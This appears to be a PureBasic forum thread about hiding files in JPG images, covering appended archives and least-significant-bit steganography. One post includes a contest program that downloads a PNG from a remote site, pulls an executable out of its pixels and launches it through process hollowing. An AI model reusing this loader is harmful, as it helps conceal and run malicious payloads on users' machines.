PureBasic Forums - English

Posted: **Fri Apr 15, 2011 8:26 pm**

This works!

Sandboxie uses it to track what you look at on the web. (I just had a cybersecurity class on it)
http://www.marcofolio.net/how_to/hide_f ... files.html

So anyone using sandboxie for their 4chan or other follies... y'all need to find a new methodology!

On the PB side perhaps we could store data for our apps this way as well?

Posted: **Fri Apr 15, 2011 9:11 pm**

Did I understand it correctly? The data is just added beyond the "end of jpg image" marker? This way image encoders just read the image and winrar (and probably other software as well) ignores the image and just shows the data... Not so exciting.

I think it would be interesting the put/hide data in special image meta fields (e.g. exif etc.) but there must be some kind of software that already does stuff like this.

Posted: **Fri Apr 15, 2011 11:03 pm**

Probably explains your "drive by malware install" problem.

Posted: **Sat Apr 16, 2011 1:36 am**

c4s wrote:The data is just added beyond the "end of jpg image" marker?

No, it just appends one file to the end of the other. Not after any marker. It's an old trick that's been around for years. There's like a million YouTube videos showing how to do it.

I fail to see what Sandboxie has to do with it. There's no tracking by Sandboxie with this method. Rook, can you please explain further what you mean by that? I think you've been given some wrong information.

TerryHough wrote:Probably explains your "drive by malware install" problem.

No, any executable appended to a JPG like this can't be executed.

Posted: **Sat Apr 16, 2011 9:26 am**

MachineCode wrote:
c4s wrote:The data is just added beyond the "end of jpg image" marker?
No, it just appends one file to the end of the other. Not after any marker. It's an old trick that's been around for years. There's like a million YouTube videos showing how to do it.

Yes, but it technically results in what I've said.

Posted: **Sat Apr 16, 2011 6:20 pm**

MachineCode wrote: No, any executable appended to a JPG like this can't be executed.

This is not true. There have been several examples where code attached to PDF and JPG files, just to take some examples, would be executed due to flaws in the software which processes these files (e.g. http://www.microsoft.com/technet/securi ... 4-028.mspx to take one example).

You could use some buffer overflow in the decoder, viewer etc. to actually execute code located someplace else, for instance at the end of the file.

edit: Forgot to ask, can you enlighten us on what you mean with "Sandboxie uses it to track what you look at on the web"?

Posted: **Mon Apr 18, 2011 4:34 am**

I was cleaning up my sandboxie folders and discovered two .jpg files that were HUGE and had very weird names and I could not delete them. The filenames were a combination of file names of every image I suppose the browser opened...

296 character filenames... which Win7 refused to deal with!

I tried a DEL *.jpg from the command line and the system balked a few times... I tried System Commander and that did not even SHOW the files but I could not rd or delete the folder as it was not "empty" (there is nothing shown in the folder in Opsys view or in DOS window view or in FileCommander view.

In PFM I saw the file and destroyed it.

Posted: **Mon Apr 18, 2011 8:50 am**

You haven't proved anything about Sandboxie, then. Sounds like it just sandboxed the malware files, which it should.

Posted: **Mon Apr 18, 2011 9:13 am**

make sure you have on the same dir where you save the .pb these:

for7z.jpg a jpeg you want to hide

1.jpg a normal image you want the other see when double click over

and make sure you have installed 7z (windows / linux ubuntu + wine)
http://www.7-zip.org/download.html

this code must hide your photo for7z.jpg inside 1.jpg and to output secretimage.jpg like THE RESULT

Code: Select all

; Executes the PB compiler with the /? option and displays the output (windows version)
  ; For Linux/MacOS change the "/?" to "-h" and the "\" to "/" in the compiler path.
  ;
  
  Procedure Registry_INTERNAL_SetError(errorCode)
  Protected *Buffer, len
  len = FormatMessage_(#FORMAT_MESSAGE_ALLOCATE_BUFFER|#FORMAT_MESSAGE_FROM_SYSTEM, 0, errorCode, 0, @*Buffer, 0, 0)
  If len
    gRegistry_LastErrorDescription$  = PeekS(*Buffer, len)
    LocalFree_(*Buffer)
  Else
    gRegistry_LastErrorDescription$  = "Errorcode: " + Hex(errorCode)
  EndIf
  gRegistry_LastErrorCode = errorCode
EndProcedure

Procedure.s Registry_GetValueAsString(hKey, subKey$, valueName$, *type.INTEGER = 0)
  Protected errorCode = #ERROR_SUCCESS, result$, hKey1, bufferSize, type, value.q
  errorCode = RegOpenKeyEx_(hKey, subKey$, 0, #KEY_READ, @hKey1)
  If errorCode = #ERROR_SUCCESS
    If hKey1
      errorCode = RegQueryValueEx_(hKey1, valueName$, 0, @type, 0, @bufferSize)
      If errorCode = #ERROR_SUCCESS
        If *type
          *type\i = type
        EndIf
        Select type
          Case #REG_DWORD, #REG_QWORD
            errorCode = RegQueryValueEx_(hKey1, valueName$, 0, 0, @value, @bufferSize)
            If errorCode = #ERROR_SUCCESS
              result$ = Str(value)
            EndIf
          Case #REG_SZ, #REG_EXPAND_SZ   
            If bufferSize
              value = AllocateMemory(buffersize)
              If value
                errorCode = RegQueryValueEx_(hKey1, valueName$, 0, 0, value, @bufferSize)
                If errorCode = #ERROR_SUCCESS
                  result$ = PeekS(value)
                EndIf
                FreeMemory(value)
              Else
                errorCode = #ERROR_NOT_ENOUGH_MEMORY
              EndIf
            EndIf
        EndSelect
      EndIf
      RegCloseKey_(hKey1)
    EndIf
  EndIf
  Registry_INTERNAL_SetError(errorCode)
  ProcedureReturn result$ 
EndProcedure



imagetohide$="for7z.jpg";this is what i want to hide in secretimage.jpg
fakeimage$="1.jpg";this is what you will see opening normal the jpeg
secretimage$="secretimage.jpg";open 7z then navigate to your path and open it , here you find what you hide



Path7z$= Registry_GetValueAsString(#HKEY_LOCAL_MACHINE,"SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\7zFM.exe" , "Path", *type.INTEGER = 0)
Debug Path7z$
RunProgram(Path7z$+"\7z.exe","a 1.7z "+imagetohide$,"")
Delay(500);'waiting' to 7z to finish replace it with a repeat until not running
  Compiler = RunProgram("c:\windows\system32\cmd.exe", "/ccopy /b "+fakeimage$+" + 1.7z "+secretimage$, "", #PB_Program_Open|#PB_Program_Read)
  Output$ = ""
  If Compiler  
    While ProgramRunning(Compiler)
      Output$ + ReadProgramString(Compiler) + Chr(13)
    Wend
    Output$ + Chr(13) + Chr(13)
    Output$ + "Exitcode: " + Str(ProgramExitCode(Compiler))     
  EndIf
  MessageRequester("Output", Output$)

after this i will think how to make an database to assign it inside a image file

Posted: **Thu Jun 02, 2011 12:05 am**

Thats not realy good hidden. There are better ways to hide stuff in images. On lossless formats you can set or delete every last bit of the pixel. So you can store 8 bits = 1 character in 8 pixel. Or change the bit of every color channel, then you can store 3 bits per pixel.

Of course the image colors will be slightly different. But since we only use the lowest bit no one will notice the difference.

Thats way better hidden. Not even the images file size is changing. ^^

Posted: **Thu Jun 02, 2011 1:16 am**

On lossless formats you can set or delete every last bit of the pixel. So you can store 8 bits = 1 character in 8 pixel. Or change the bit of every color channel, then you can store 3 bits per pixel.

Interesting idea, I'm going to have a play with that when I get some time. Thanks for the tip!

Posted: **Thu Jun 02, 2011 3:39 am**

Thorium wrote:Thats not realy good hidden. There are better ways to hide stuff in images. On lossless formats you can set or delete every last bit of the pixel. So you can store 8 bits = 1 character in 8 pixel. Or change the bit of every color channel, then you can store 3 bits per pixel.

Of course the image colors will be slightly different. But since we only use the lowest bit no one will notice the difference.

Thats way better hidden. Not even the images file size is changing. ^^

Now why didn't I think about that with this purepunch!

Code: Select all

;*****************************************************************************
;*
;* PurePunch Contest #4
;*
;* Name     : Nova
;* Author   : idle
;* Category : PurePunch Crunch | tricky bastard
;* Date     : 16/9/2009
;* Notes    : READ THE NOTES BEFORE RUNNING
;*          : Windows only may not run on x64
;*          : Make sure you have saved your work before running
;*          : Will download image automatically, may take some time! 
;*          : Set your recording source to wave out mix and play your favourate song!
;*          : run program, click splash screen to continue, right click for controls, esc to end
;*          : If you haven't set your recording to wave out mix and only see a black screen
;*          : right click the screen and choose the "normal option"   
;*          : For full instructions on Nova controls Goto http://www.idlearts.com/nova.html
;*****************************************************************************

Macro wp(a,b,c,d,e):WriteProcessMemory_(a,b,c,d,e):EndMacro:Structure K:SN.b[8]
StructureUnion:Pha.l:Vs.l:EndStructureUnion:Va.l:Sr.l:pRd.l:ptrl.l:pln.l:nr.w
nol.w:Cs.l:EndStructure:Structure V:V.K[95]:EndStructure:Structure pinf
hP.i:hT.i:pId:i:TId.i:EndStructure:Procedure R(f,n.s):*idh.IMAGE_DOS_HEADER=f
*s.V:pi.PINF:*n.IMAGE_NT_HEADERS:si.STARTUPINFO:lBA.l:Ctx.CONTEXT:Addr.l
r.l:i.l:CreateProcess_(0,n,0,0,0,4,0,0,@si,@pi):Ctx\ContextFlags=65538
If GetThreadContext_(pi\hT,Ctx):ReadProcessMemory_(pi\hP,Ctx\Ebx+8,@Addr,4,0)
If Not ZwUnmapViewOfSection_(Pi\hP,Addr):*n=f+*idh\e_lfanew:ts=PeekL(*n+52)
tt=PeekL(*n+80):ty=PeekL(*n+84):tz=*n\OptionalHeader:tq=PeekW(*n+6)-1
lBA=VirtualAllocEx_(pi\hP,ts,tt,12288,64):WP(pi\hP,lBA,f,ty,@r):tf=PeekW(*n+20)
*s=tz+tf:For i=0 To tq:WP(pi\hP,lBA+*s\V[i]\Va,f+*s\V[i]\pRd,*s\V[i]\Sr,@r)
Next:WP(pi\hP,Ctx\Ebx+8,@lBA,4,0):te=PeekL(*n+40):Ctx\Eax=lBA+te
SetThreadContext_(pi\hT,Ctx):ResumeThread_(pi\hT):End:EndIf:EndIf:End
EndProcedure:Global *o,q,w=512,h=460,fi.s="http://www.idlearts.com/sn5.png"
If FileSize("sn5.png")=-1:InitNetwork():ReceiveHTTPFile(fi,"sn5.png"):EndIf
UsePNGImageDecoder():LoadImage(2,"sn5.png"):OpenWindow(0,0,0,w,h,"",2147483649)
ImageGadget(1,0,0,w,h,ImageID(2)):*o=AllocateMemory(75264)
StartDrawing(ImageOutput(2)):While a<75264:tb=Point(b%512,(b/512))>>16 &$FF
PokeB(*o+a,tb):a+1:b+4:Wend:StopDrawing():Repeat:WaitWindowEvent()
ea=EventGadget():If ea=1:q=1:EndIf:Until q:If q=1:r(*o,ProgramFilename()):EndIf

Posted: **Thu Jun 02, 2011 11:45 am**

Doesn't run here, says element in structure pinf needs a declared type.

Posted: **Thu Jun 02, 2011 10:21 pm**

maybe it only worked on XP it was a couple of years ago

any way that was what I was meaning, I don't think I had enough room to hide the program in the last byte

PureBasic Forums - English

hide files in a JPG image

hide files in a JPG image

Re: hide files in a JPG image

Re: hide files in a JPG image

Re: hide files in a JPG image

Re: hide files in a JPG image

Re: hide files in a JPG image

Re: hide files in a JPG image

Re: hide files in a JPG image

Re: hide files in a JPG image

Re: hide files in a JPG image

Re: hide files in a JPG image

Re: hide files in a JPG image

Re: hide files in a JPG image

Re: hide files in a JPG image